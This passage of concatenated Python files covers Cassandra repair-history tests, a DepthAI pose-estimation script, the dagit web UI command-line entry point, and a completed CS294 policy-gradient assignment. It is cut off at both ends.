system_distributed.parent_repair_history;') repair_history = execute_with_all('SELECT * FROM system_distributed.repair_history;') if not include_system_keyspaces: parent_repair_history = [row for row in parent_repair_history if 'system' not in row.keyspace_name] repair_history = [row for row in repair_history if 'system' not in row.keyspace_name] return RepairTableContents(parent_repair_history=parent_repair_history, repair_history=repair_history) @pytest.mark.skip(reason='hangs CI') def test_initial_empty_repair_tables(self): logger.debug('repair tables:') logger.debug(self.repair_table_contents(node=self.node1, include_system_keyspaces=False)) repair_tables_dict = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)._asdict() for table_name, table_contents in list(repair_tables_dict.items()): assert not table_contents, '{} is non-empty'.format(table_name) def test_repair_parent_table(self): """ Test that `system_distributed.parent_repair_history` is properly populated after repair by: - running repair on `node` and - checking that there are a non-zero number of entries in `parent_repair_history`. """ self.node1.repair() parent_repair_history, _ = self.repair_table_contents(node=self.node1, include_system_keyspaces=False) assert len(parent_repair_history) def test_repair_table(self): """ Test that `system_distributed.repair_history` is properly populated after repair by: - running repair on `node` and - checking that there are a non-zero number of entries in `repair_history`. """ self.node1.repair() _, repair_history = self.repair_table_contents(node=self.node1, include_system_keyspaces=False) assert len(repair_history)
main.py
import argparse import threading import time from pathlib import Path from pose import getKeypoints, getValidPairs, getPersonwiseKeypoints import cv2 import depthai as dai import numpy as np from imutils.video import FPS parser = argparse.ArgumentParser() parser.add_argument('-nd', '--no-debug', action="store_true", help="Prevent debug output") parser.add_argument('-cam', '--camera', action="store_true", help="Use DepthAI 4K RGB camera for inference (conflicts with -vid)") parser.add_argument('-vid', '--video', type=str, help="Path to video file to be used for inference (conflicts with -cam)") args = parser.parse_args() if not args.camera and not args.video: raise RuntimeError("No source selected. Please use either \"-cam\" to use RGB camera as a source or \"-vid <path>\" to run on video") debug = not args.no_debug def cos_dist(a, b): return np.dot(a, b)/(np.linalg.norm(a)*np.linalg.norm(b)) def to_tensor_result(packet): return { tensor.name: np.array(packet.getLayerFp16(tensor.name)).reshape(tensor.dims) for tensor in packet.getRaw().tensors } def frame_norm(frame, bbox): return (np.clip(np.array(bbox), 0, 1) * np.array([*frame.shape[:2], *frame.shape[:2]])[::-1]).astype(int) def to_planar(arr: np.ndarray, shape: tuple) -> list: return cv2.resize(arr, shape).transpose(2,0,1).flatten() def create_pipeline(): print("Creating pipeline...") pipeline = dai.Pipeline() if args.camera: # ColorCamera print("Creating Color Camera...") cam = pipeline.createColorCamera() cam.setPreviewSize(456, 256) cam.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P) cam.setInterleaved(False) cam.setBoardSocket(dai.CameraBoardSocket.RGB) cam_xout = pipeline.createXLinkOut() cam_xout.setStreamName("cam_out") cam.preview.link(cam_xout.input) controlIn = pipeline.createXLinkIn() controlIn.setStreamName('control') controlIn.out.link(cam.inputControl) # NeuralNetwork print("Creating Human Pose Estimation Neural Network...") pose_nn = pipeline.createNeuralNetwork() if args.camera: pose_nn.setBlobPath(str(Path("models/human-pose-estimation-0001_openvino_2021.2_6shave.blob").resolve().absolute())) else: pose_nn.setBlobPath(str(Path("models/human-pose-estimation-0001_openvino_2021.2_8shave.blob").resolve().absolute())) # Increase threads for detection pose_nn.setNumInferenceThreads(2) # Specify that network takes latest arriving frame in non-blocking manner pose_nn.input.setQueueSize(1) pose_nn.input.setBlocking(False) pose_nn_xout = pipeline.createXLinkOut() pose_nn_xout.setStreamName("pose_nn") pose_nn.out.link(pose_nn_xout.input) if args.camera: cam.preview.link(pose_nn.input) else: pose_in = pipeline.createXLinkIn() pose_in.setStreamName("pose_in") pose_in.out.link(pose_nn.input) print("Pipeline created.") return pipeline colors = [[0, 100, 255], [0, 100, 255], [0, 255, 255], [0, 100, 255], [0, 255, 255], [0, 100, 255], [0, 255, 0], [255, 200, 100], [255, 0, 255], [0, 255, 0], [255, 200, 100], [255, 0, 255], [0, 0, 255], [255, 0, 0], [200, 200, 0], [255, 0, 0], [200, 200, 0], [0, 0, 0]] POSE_PAIRS = [[1, 2], [1, 5], [2, 3], [3, 4], [5, 6], [6, 7], [1, 8], [8, 9], [9, 10], [1, 11], [11, 12], [12, 13], [1, 0], [0, 14], [14, 16], [0, 15], [15, 17], [2, 17], [5, 16]] running = True pose = None keypoints_list = None detected_keypoints = None personwiseKeypoints = None class FPSHandler: def __init__(self, cap=None): self.timestamp = time.time() self.start = time.time() self.framerate = cap.get(cv2.CAP_PROP_FPS) if cap is not None else None self.frame_cnt = 0 self.ticks = {} self.ticks_cnt = {} def next_iter(self): if not args.camera: frame_delay = 1.0 / self.framerate delay = (self.timestamp + frame_delay) - time.time() if delay > 0: time.sleep(delay) self.timestamp = time.time() self.frame_cnt += 1 def tick(self, name): if name in self.ticks: self.ticks_cnt[name] += 1 else: self.ticks[name] = time.time() self.ticks_cnt[name] = 0 def tick_fps(self, name): if name in self.ticks: return self.ticks_cnt[name] / (time.time() - self.ticks[name]) else: return 0 def fps(self): return self.frame_cnt / (self.timestamp - self.start) if args.camera: fps = FPSHandler() else: cap = cv2.VideoCapture(str(Path(args.video).resolve().absolute())) fps = FPSHandler(cap) def pose_thread(in_queue): global keypoints_list, detected_keypoints, personwiseKeypoints while running: try: raw_in = in_queue.get() except RuntimeError: return fps.tick('nn') heatmaps = np.array(raw_in.getLayerFp16('Mconv7_stage2_L2')).reshape((1, 19, 32, 57)) pafs = np.array(raw_in.getLayerFp16('Mconv7_stage2_L1')).reshape((1, 38, 32, 57)) heatmaps = heatmaps.astype('float32') pafs = pafs.astype('float32') outputs = np.concatenate((heatmaps, pafs), axis=1) new_keypoints = [] new_keypoints_list = np.zeros((0, 3)) keypoint_id = 0 for row in range(18): probMap = outputs[0, row, :, :] probMap = cv2.resize(probMap, (w, h)) # (456, 256) keypoints = getKeypoints(probMap, 0.3) new_keypoints_list = np.vstack([new_keypoints_list, *keypoints]) keypoints_with_id = [] for i in range(len(keypoints)): keypoints_with_id.append(keypoints[i] + (keypoint_id,)) keypoint_id += 1 new_keypoints.append(keypoints_with_id) valid_pairs, invalid_pairs = getValidPairs(outputs, w, h, new_keypoints) newPersonwiseKeypoints = getPersonwiseKeypoints(valid_pairs, invalid_pairs, new_keypoints_list) detected_keypoints, keypoints_list, personwiseKeypoints = (new_keypoints, new_keypoints_list, newPersonwiseKeypoints) with dai.Device(create_pipeline()) as device: print("Starting pipeline...") device.startPipeline() if args.camera: cam_out = device.getOutputQueue("cam_out", 1, True) controlQueue = device.getInputQueue('control') else: pose_in = device.getInputQueue("pose_in") pose_nn = device.getOutputQueue("pose_nn", 1, False) t = threading.Thread(target=pose_thread, args=(pose_nn, )) t.start() def should_run(): return cap.isOpened() if args.video else True def get_frame(): if args.video: return cap.read() else: return True, np.array(cam_out.get().getData()).reshape((3, 256, 456)).transpose(1, 2, 0).astype(np.uint8) try: while should_run(): read_correctly, frame = get_frame() if not read_correctly: break fps.next_iter() h, w = frame.shape[:2] # 256, 456 debug_frame = frame.copy() if not args.camera: nn_data = dai.NNData() nn_data.setLayer("input", to_planar(frame, (456, 256))) pose_in.send(nn_data) if debug: if keypoints_list is not None and detected_keypoints is not None and personwiseKeypoints is not None: for i in range(18): for j in range(len(detected_keypoints[i])): cv2.circle(debug_frame, detected_keypoints[i][j][0:2], 5, colors[i], -1, cv2.LINE_AA) for i in range(17): for n in range(len(personwiseKeypoints)): index = personwiseKeypoints[n][np.array(POSE_PAIRS[i])] if -1 in index: continue B = np.int32(keypoints_list[index.astype(int), 0]) A = np.int32(keypoints_list[index.astype(int), 1]) cv2.line(debug_frame, (B[0], A[0]), (B[1], A[1]), colors[i], 3, cv2.LINE_AA) cv2.putText(debug_frame, f"RGB FPS: {round(fps.fps(), 1)}", (5, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0)) cv2.putText(debug_frame, f"NN FPS: {round(fps.tick_fps('nn'), 1)}", (5, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0)) cv2.imshow("rgb", debug_frame) key = cv2.waitKey(1) if key == ord('q'): break elif key == ord('t'): print("Autofocus trigger (and disable continuous)") ctrl = dai.CameraControl() ctrl.setAutoFocusMode(dai.CameraControl.AutoFocusMode.AUTO) ctrl.setAutoFocusTrigger() controlQueue.send(ctrl) except KeyboardInterrupt: pass running = False t.join() print("FPS: {:.2f}".format(fps.fps())) if not args.camera: cap.release()
cli.py
import os import sys import threading import click import six from gevent import pywsgi from geventwebsocket.handler import WebSocketHandler from dagster import ExecutionTargetHandle, check, seven from dagster.cli.load_handle import handle_for_repo_cli_args from dagster.cli.pipeline import repository_target_argument from dagster.core.instance import DagsterInstance from dagster.core.telemetry import upload_logs from dagster.utils import DEFAULT_REPOSITORY_YAML_FILENAME, pushd from .app import create_app from .reloader import DagitReloader from .version import __version__ def create_dagit_cli(): return ui # pylint: disable=no-value-for-parameter REPO_TARGET_WARNING = ( 'Can only use ONE of --repository-yaml/-y, --python-file/-f, --module-name/-m.' ) DEFAULT_DAGIT_HOST = '127.0.0.1' DEFAULT_DAGIT_PORT = 3000 @click.command( name='ui', help=( 'Run dagit. Loads a repository or pipeline.\n\n{warning}'.format( warning=REPO_TARGET_WARNING ) + ( '\n\n Examples:' '\n\n1. dagit' '\n\n2. dagit -y path/to/{default_filename}' '\n\n3. dagit -f path/to/file.py -n define_repo' '\n\n4. dagit -m some_module -n define_repo' '\n\n5. dagit -f path/to/file.py -n define_pipeline' '\n\n6. dagit -m some_module -n define_pipeline' '\n\n7. dagit -p 3333' '\n\nOptions Can also provide arguments via environment variables prefixed with DAGIT_' '\n\n DAGIT_PORT=3333 dagit' ).format(default_filename=DEFAULT_REPOSITORY_YAML_FILENAME) ), ) @repository_target_argument @click.option( '--host', '-h', type=click.STRING, default=DEFAULT_DAGIT_HOST, help="Host to run server on, default is {default_host}".format(default_host=DEFAULT_DAGIT_HOST), ) @click.option( '--port', '-p', type=click.INT, help="Port to run server on, default is {default_port}".format(default_port=DEFAULT_DAGIT_PORT), ) @click.option( '--storage-fallback', help="Base directory for dagster storage if $DAGSTER_HOME is not set", default=None, type=click.Path(), ) @click.option( '--reload-trigger', help=( "Optional file path being monitored by a parent process that dagit-cli can touch to " "re-launch itself." ), default=None, hidden=True, type=click.Path(), ) @click.option( '--workdir', help=( "Set this to change the working directory before invoking dagit. Intended to support " "test cases" ), default=None, hidden=True, type=click.Path(), ) @click.version_option(version=__version__, prog_name='dagit') def ui(host, port, storage_fallback, reload_trigger, workdir, **kwargs): handle = handle_for_repo_cli_args(kwargs) # add the path for the cwd so imports in dynamically loaded code work correctly sys.path.append(os.getcwd()) if port is None: port_lookup = True port = DEFAULT_DAGIT_PORT else: port_lookup = False # The dagit entrypoint always sets this but if someone launches dagit-cli # directly make sure things still works by providing a temp directory if storage_fallback is None: storage_fallback = seven.TemporaryDirectory().name if workdir is not None: with pushd(workdir): host_dagit_ui(handle, host, port, storage_fallback, reload_trigger, port_lookup) else: host_dagit_ui(handle, host, port, storage_fallback, reload_trigger, port_lookup) def host_dagit_ui(handle, host, port, storage_fallback, reload_trigger=None, port_lookup=True): check.inst_param(handle, 'handle', ExecutionTargetHandle) instance = DagsterInstance.get(storage_fallback) reloader = DagitReloader(reload_trigger=reload_trigger) app = create_app(handle, instance, reloader) start_server(host, port, app, port_lookup) def start_server(host, port, app, port_lookup, port_lookup_attempts=0): server = pywsgi.WSGIServer((host, port), app, handler_class=WebSocketHandler) print( 'Serving on http://{host}:{port} in process {pid}'.format( host=host, port=port, pid=os.getpid() ) ) try: thread = threading.Thread(target=upload_logs, args=()) thread.daemon = True thread.start() server.serve_forever() except OSError as os_error: if 'Address already in use' in str(os_error): if port_lookup and ( port_lookup_attempts > 0 or click.confirm( ( 'Another process on your machine is already listening on port {port}. ' 'Would you like to run the app at another port instead?' ).format(port=port) ) ): port_lookup_attempts += 1 start_server(host, port + port_lookup_attempts, app, True, port_lookup_attempts) else: six.raise_from( Exception( ( 'Another process on your machine is already listening on port {port}. ' 'It is possible that you have another instance of dagit ' 'running somewhere using the same port. Or it could be another ' 'random process. Either kill that process or use the -p option to ' 'select another port.' ).format(port=port) ), os_error, ) else: raise os_error cli = create_dagit_cli() def main(): # click magic cli(auto_envvar_prefix='DAGIT') # pylint:disable=E1120
train_pg_f18.py
""" Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017 Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany """ import numpy as np import tensorflow as tf import gym import logz import os import time import inspect from multiprocessing import Process #============================================================================================# # Utilities #============================================================================================# def normalize(values, mean=0., std=1.): values = (values - np.mean(values)) / (np.std(values) + 1e-7) return mean + ((std + 1e-7) * values) #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None): """ Builds a feedforward neural network arguments: input_placeholder: placeholder variable for the state (batch_size, input_size) output_size: size of the output layer scope: variable scope of the network n_layers: number of hidden layers size: dimension of the hidden layer activation: activation of the hidden layers output_activation: activation of the ouput layers returns: output placeholder of the network (the result of a forward pass) Hint: use tf.layers.dense """ # YOUR CODE HERE with tf.variable_scope(scope): x = input_placeholder for i in range(n_layers): x = tf.layers.dense(x, size, activation=activation, name='h{}'.format(i + 1)) output_placeholder = tf.layers.dense(x, output_size, activation=output_activation, name='output') return output_placeholder def pathlength(path): return len(path["reward"]) def setup_logger(logdir, locals_): # Configure output directory for logging logz.configure_output_dir(logdir) # Log experimental parameters args = inspect.getargspec(train_PG)[0] params = {k: locals_[k] if k in locals_ else None for k in args} logz.save_params(params) #============================================================================================# # Policy Gradient #============================================================================================# class Agent(object): def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args): super(Agent, self).__init__() self.ob_dim = computation_graph_args['ob_dim'] self.ac_dim = computation_graph_args['ac_dim'] self.discrete = computation_graph_args['discrete'] self.size = computation_graph_args['size'] self.n_layers = computation_graph_args['n_layers'] self.learning_rate = computation_graph_args['learning_rate'] self.animate = sample_trajectory_args['animate'] self.max_path_length = sample_trajectory_args['max_path_length'] self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch'] self.gamma = estimate_return_args['gamma'] self.reward_to_go = estimate_return_args['reward_to_go'] self.nn_baseline = estimate_return_args['nn_baseline'] self.normalize_advantages = estimate_return_args['normalize_advantages'] def init_tf_sess(self): tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1) tf_config.gpu_options.allow_growth = True # FIX: Necessary to run multiple seeds without all but one crashing self.sess = tf.Session(config=tf_config) self.sess.__enter__() # equivalent to `with self.sess:` tf.global_variables_initializer().run() #pylint: disable=E1101 #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def define_placeholders(self): """ Placeholders for batch batch observations / actions / advantages in policy gradient loss function. See Agent.build_computation_graph for notation returns: sy_ob_no: placeholder for observations sy_ac_na: placeholder for actions sy_adv_n: placeholder for advantages """ sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32) if self.discrete: sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32) else: sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32) # YOUR CODE HERE sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32) return sy_ob_no, sy_ac_na, sy_adv_n #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def policy_forward_pass(self, sy_ob_no): """ Constructs the symbolic operation for the policy network outputs, which are the parameters of the policy distribution p(a|s) arguments: sy_ob_no: (batch_size, self.ob_dim) returns: the parameters of the policy. if discrete, the parameters are the logits of a categorical distribution over the actions sy_logits_na: (batch_size, self.ac_dim) if continuous, the parameters are a tuple (mean, log_std) of a Gaussian distribution over actions. log_std should just be a trainable variable, not a network output. sy_mean: (batch_size, self.ac_dim) sy_logstd: (self.ac_dim,) Hint: use the 'build_mlp' function to output the logits (in the discrete case) and the mean (in the continuous case). Pass in self.n_layers for the 'n_layers' argument, and pass in self.size for the 'size' argument. """ if self.discrete: # YOUR_CODE_HERE sy_logits_na = build_mlp(sy_ob_no, self.ac_dim, 'policy_nn', self.n_layers, self.size) return sy_logits_na else: # YOUR_CODE_HERE sy_mean = build_mlp(sy_ob_no, self.ac_dim, 'policy_nn', self.n_layers, self.size) sy_logstd = tf.get_variable('sy_logstd', shape=[self.ac_dim]) return sy_mean, sy_logstd #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def sample_action(self, policy_parameters): """ Constructs a symbolic operation for stochastically sampling from the policy distribution arguments: policy_parameters if discrete: logits of a categorical distribution over actions sy_logits_na: (batch_size, self.ac_dim) if continuous: (mean, log_std) of a Gaussian distribution over actions sy_mean: (batch_size, self.ac_dim) sy_logstd: (self.ac_dim,) returns: sy_sampled_ac: if discrete: (batch_size,) if continuous: (batch_size, self.ac_dim) Hint: for the continuous case, use the reparameterization trick: The output from a Gaussian distribution with mean 'mu' and std 'sigma' is mu + sigma * z, z ~ N(0, I) This reduces the problem to just sampling z. (Hint: use tf.random_normal!) """ if self.discrete: sy_logits_na = policy_parameters # YOUR_CODE_HERE sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, 1), axis=1) else: sy_mean, sy_logstd = policy_parameters # YOUR_CODE_HERE sy_sampled_ac = tf.random_normal(tf.shape(sy_mean), mean=sy_mean, stddev=tf.exp(sy_logstd)) return sy_sampled_ac #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def get_log_prob(self, policy_parameters, sy_ac_na): """ Constructs a symbolic operation for computing the log probability of a set of actions that were actually taken according to the policy arguments: policy_parameters if discrete: logits of a categorical distribution over actions sy_logits_na: (batch_size, self.ac_dim) if continuous: (mean, log_std) of a Gaussian distribution over actions sy_mean: (batch_size, self.ac_dim) sy_logstd: (self.ac_dim,) sy_ac_na: if discrete: (batch_size,) if continuous: (batch_size, self.ac_dim) returns: sy_logprob_n: (batch_size) Hint: For the discrete case, use the log probability under a categorical distribution. For the continuous case, use the log probability under a multivariate gaussian. """ if self.discrete: sy_logits_na = policy_parameters # YOUR_CODE_HERE # Log probability under a categorical distribution is equal to the negative cross_entropy sy_logprob_n = -tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sy_ac_na, logits=sy_logits_na) else: sy_mean, sy_logstd = policy_parameters # YOUR_CODE_HERE multivariate_gaussian = tf.contrib.distributions.MultivariateNormalDiag(loc=sy_mean, scale_diag=tf.exp(sy_logstd)) sy_logprob_n = multivariate_gaussian.log_prob(sy_ac_na) return sy_logprob_n def build_computation_graph(self): """ Notes on notation: Symbolic variables have the prefix sy_, to distinguish them from the numerical values that are computed later in the function Prefixes and suffixes: ob - observation ac - action _no - this tensor should have shape (batch self.size /n/, observation dim) _na - this tensor should have shape (batch self.size /n/, action dim) _n - this tensor should have shape (batch self.size /n/) Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis is None ---------------------------------------------------------------------------------- loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate to get the policy gradient. """ self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders() # The policy takes in an observation and produces a distribution over the action space self.policy_parameters = self.policy_forward_pass(self.sy_ob_no) # We can sample actions from this action distribution. # This will be called in Agent.sample_trajectory() where we generate a rollout. self.sy_sampled_ac = self.sample_action(self.policy_parameters) # We can also compute the logprob of the actions that were actually taken by the policy # This is used in the loss function. self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na) #========================================================================================# # ----------PROBLEM 2---------- # Loss Function and Training Operation #========================================================================================# # YOUR CODE HERE loss = tf.reduce_mean(-self.sy_logprob_n * self.sy_adv_n) self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss) #========================================================================================# # ----------PROBLEM 6---------- # Optional Baseline # # Define placeholders for targets, a loss function and an update op for fitting a # neural network baseline. These will be used to fit the neural network baseline. #========================================================================================# if self.nn_baseline: self.baseline_prediction = tf.squeeze(build_mlp( self.sy_ob_no, 1, "nn_baseline", n_layers=self.n_layers, size=self.size)) # YOUR_CODE_HERE self.sy_target_n = tf.placeholder(shape=[None], name="target", dtype=tf.float32) baseline_loss = tf.nn.l2_loss(self.baseline_prediction - self.sy_target_n) self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss) def sample_trajectories(self, itr, env): # Collect paths until we have enough timesteps timesteps_this_batch = 0 paths = [] while True: animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate) path = self.sample_trajectory(env, animate_this_episode) paths.append(path) timesteps_this_batch += pathlength(path) if timesteps_this_batch > self.min_timesteps_per_batch: break return paths, timesteps_this_batch def sample_trajectory(self, env, animate_this_episode): ob = env.reset() obs, acs, rewards = [], [], [] steps = 0 while True: if animate_this_episode: env.render() time.sleep(0.1) obs.append(ob) #====================================================================================# # ----------PROBLEM 3---------- #====================================================================================# ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: ob[np.newaxis]}) # YOUR CODE HERE ac = ac[0] acs.append(ac) ob, rew, done, _ = env.step(ac) rewards.append(rew) steps += 1 if done or steps > self.max_path_length: break path = {"observation" : np.array(obs, dtype=np.float32), "reward" : np.array(rewards, dtype=np.float32), "action" : np.array(acs, dtype=np.float32)} return path #====================================================================================# # ----------PROBLEM 3---------- #====================================================================================# def sum_of_rewards(self, re_n): """ Monte Carlo estimation of the Q function. let sum_of_path_lengths be the sum of the lengths of the paths sampled from Agent.sample_trajectories let num_paths be the number of paths sampled from Agent.sample_trajectories arguments: re_n: length: num_paths. Each element in re_n is a numpy array containing the rewards for the particular path returns: q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths ---------------------------------------------------------------------------------- Your code should construct numpy arrays for Q-values which will be used to compute advantages (which will in turn be fed to the placeholder you defined in Agent.define_placeholders). Recall that the expression for the policy gradient PG is PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )] where tau=(s_0, a_0, ...) is a trajectory, Q_t is the Q-value at time t, Q^{pi}(s_t, a_t), and b_t is a baseline which may depend on s_t. You will write code for two cases, controlled by the flag 'reward_to_go': Case 1: trajectory-based PG (reward_to_go = False) Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over entire trajectory (regardless of which time step the Q-value should be for). For this case, the policy gradient estimator is E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)] where Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}. Thus, you should compute Q_t = Ret(tau) Case 2: reward-to-go PG (reward_to_go = True) Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting from time step t. Thus, you should compute Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'} Store the Q-values for all timesteps and all trajectories in a variable 'q_n', like the 'ob_no' and 'ac_na' above. """ # YOUR_CODE_HERE if self.reward_to_go: def _trajectory_rewards(re): q = np.empty_like(re) q[-1] = re[-1] # Set the reward to go of the last timestep to the last reward # Iterate backwards to compute the rewards to go for each timestep for timestep in range(len(re) - 2, -1, -1): q[timestep] = re[timestep] + self.gamma * q[timestep + 1] return q else: def _trajectory_rewards(re): # Only compute the reward for one timestep in the trajectory, and copy value # This reduces computation time, since all rewards are the same for a given trajectory return [np.sum(np.power(self.gamma, np.arange(len(re))) * re)] * len(re) q_n = np.concatenate([_trajectory_rewards(re) for re in re_n]) return q_n def compute_advantage(self, ob_no, q_n): """ Computes advantages by (possibly) subtracting a baseline from the estimated Q values let sum_of_path_lengths be the sum of the lengths of the paths sampled from Agent.sample_trajectories let num_paths be the number of paths sampled from Agent.sample_trajectories arguments: ob_no: shape: (sum_of_path_lengths, ob_dim) q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths returns: adv_n: shape: (sum_of_path_lengths). A single vector for the estimated advantages whose length is the sum of the lengths of the paths """ #====================================================================================# # ----------PROBLEM 6---------- # Computing Baselines #====================================================================================# if self.nn_baseline: # If nn_baseline is True, use your neural network to predict reward-to-go # at each timestep for each trajectory, and save the result in a variable 'b_n' # like 'ob_no', 'ac_na', and 'q_n'. # # Hint #bl1: rescale the output from the nn_baseline to match the statistics # (mean and std) of the current batch of Q-values. (Goes with Hint # #bl2 in Agent.update_parameters. # YOUR CODE HERE b_n = self.sess.run(self.baseline_prediction, feed_dict={self.sy_ob_no: ob_no}) b_n = normalize(b_n, mean=np.mean(q_n), std=np.std(q_n)) adv_n = q_n - b_n else: adv_n = q_n.copy() return adv_n def estimate_return(self, ob_no, re_n): """ Estimates the returns over a set of trajectories. let sum_of_path_lengths be the sum of the lengths of the paths sampled from Agent.sample_trajectories let num_paths be the number of paths sampled from Agent.sample_trajectories arguments: ob_no: shape: (sum_of_path_lengths, ob_dim) re_n: length: num_paths. Each element in re_n is a numpy array containing the rewards for the particular path returns: q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths adv_n: shape: (sum_of_path_lengths). A single vector for the estimated advantages whose length is the sum of the lengths of the paths """ q_n = self.sum_of_rewards(re_n) adv_n = self.compute_advantage(ob_no, q_n) #====================================================================================# # ----------PROBLEM 3---------- # Advantage Normalization #====================================================================================# if self.normalize_advantages: # On the next line, implement a trick which is known empirically to reduce variance # in policy gradient methods: normalize adv_n to have mean zero and std=1. adv_n = normalize(adv_n) # YOUR_CODE_HERE return q_n, adv_n def update_parameters(self, ob_no, ac_na, q_n, adv_n): """ Update the parameters of the policy and (possibly) the neural network baseline, which is trained to approximate the value function. arguments: ob_no: shape: (sum_of_path_lengths, ob_dim) ac_na: shape: (sum_of_path_lengths). q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths adv_n: shape: (sum_of_path_lengths). A single vector for the estimated advantages whose length is the sum of the lengths of the paths returns: nothing """ #====================================================================================# # ----------PROBLEM 6---------- # Optimizing Neural Network Baseline #====================================================================================# if self.nn_baseline: # If a neural network baseline is used, set up the targets and the inputs for the # baseline. # # Fit it to the current batch in order to use for the next iteration. Use the # baseline_update_op you defined earlier. # # Hint #bl2: Instead of trying to target raw Q-values directly, rescale the # targets to have mean zero and std=1. (Goes with Hint #bl1 in # Agent.compute_advantage.) # YOUR_CODE_HERE target_n = normalize(q_n) self.sess.run(self.baseline_update_op, feed_dict={self.sy_ob_no: ob_no, self.sy_target_n: target_n}) #====================================================================================# # ----------PROBLEM 3---------- # Performing the Policy Update #====================================================================================# # Call the update operation necessary to perform the policy gradient update based on # the current batch of rollouts. # # For debug purposes, you may wish to save the value of the loss function before # and after an update, and then log them below. # YOUR_CODE_HERE self.sess.run(self.update_op, feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n}) def train_PG( exp_name, env_name, n_iter, gamma, min_timesteps_per_batch, max_path_length, learning_rate, reward_to_go, animate, logdir, normalize_advantages, nn_baseline, seed, n_layers, size): start = time.time() #========================================================================================# # Set Up Logger #========================================================================================# setup_logger(logdir, locals()) #========================================================================================# # Set Up Env #========================================================================================# # Make the gym environment env = gym.make(env_name) # Set random seeds tf.set_random_seed(seed) np.random.seed(seed) env.seed(seed) # Maximum length for episodes max_path_length = max_path_length or env.spec.max_episode_steps # Is this env continuous, or self.discrete? discrete = isinstance(env.action_space, gym.spaces.Discrete) # Observation and action sizes ob_dim = env.observation_space.shape[0] ac_dim = env.action_space.n if discrete else env.action_space.shape[0] #========================================================================================# # Initialize Agent #========================================================================================# computation_graph_args = { 'n_layers': n_layers, 'ob_dim': ob_dim, 'ac_dim': ac_dim, 'discrete': discrete, 'size': size, 'learning_rate': learning_rate, } sample_trajectory_args = { 'animate': animate, 'max_path_length': max_path_length, 'min_timesteps_per_batch': min_timesteps_per_batch, } estimate_return_args = { 'gamma': gamma, 'reward_to_go': reward_to_go, 'nn_baseline': nn_baseline, 'normalize_advantages': normalize_advantages, } agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args) # build computation graph agent.build_computation_graph() # tensorflow: config, session, variable initialization agent.init_tf_sess() #========================================================================================# # Training Loop #========================================================================================# total_timesteps = 0 for itr in range(n_iter): print("********** Iteration %i ************"%itr) paths, timesteps_this_batch = agent.sample_trajectories(itr, env) total_timesteps += timesteps_this_batch # Build arrays for observation, action for the policy gradient update by concatenating # across paths ob_no = np.concatenate([path["observation"] for path in paths]) ac_na = np.concatenate([path["action"] for path in paths]) re_n = [path["reward"] for path in paths] q_n, adv_n = agent.estimate_return(ob_no, re_n) agent.update_parameters(ob_no, ac_na, q_n, adv_n) # Log diagnostics returns = [path["reward"].sum() for path in paths] ep_lengths = [pathlength(path) for path in paths] logz.log_tabular("Time", time.time() - start) logz.log_tabular("Iteration", itr) logz.log_tabular("AverageReturn", np.mean(returns)) logz.log_tabular("StdReturn", np.std(returns)) logz.log_tabular("MaxReturn", np.max(returns)) logz.log_tabular("MinReturn", np.min(returns)) logz.log_tabular("EpLenMean", np.mean(ep_lengths)) logz.log_tabular("EpLenStd", np.std(ep_lengths)) logz.log_tabular("TimestepsThisBatch", timesteps_this_batch) logz.log_tabular("TimestepsSoFar", total_timesteps) logz.dump_tabular() logz.pickle_tf_vars() def main(): import argparse parser = argparse.ArgumentParser() parser.add_argument('env_name', type=str) parser.add_argument('--exp_name', type=str, default='vpg') parser.add_argument('--no_time', '-nt', action='store_true') parser.add_argument('--render', action='store_true') parser.add_argument('--discount', type=float, default=1.0) parser.add_argument('--n_iter', '-n', type=int, default=100) parser.add_argument('--batch_size', '-b', type=int, default=1000) parser.add_argument('--ep_len', '-ep', type=float, default=-1.) parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3) parser.add_argument('--reward_to_go', '-rtg', action='store_true') 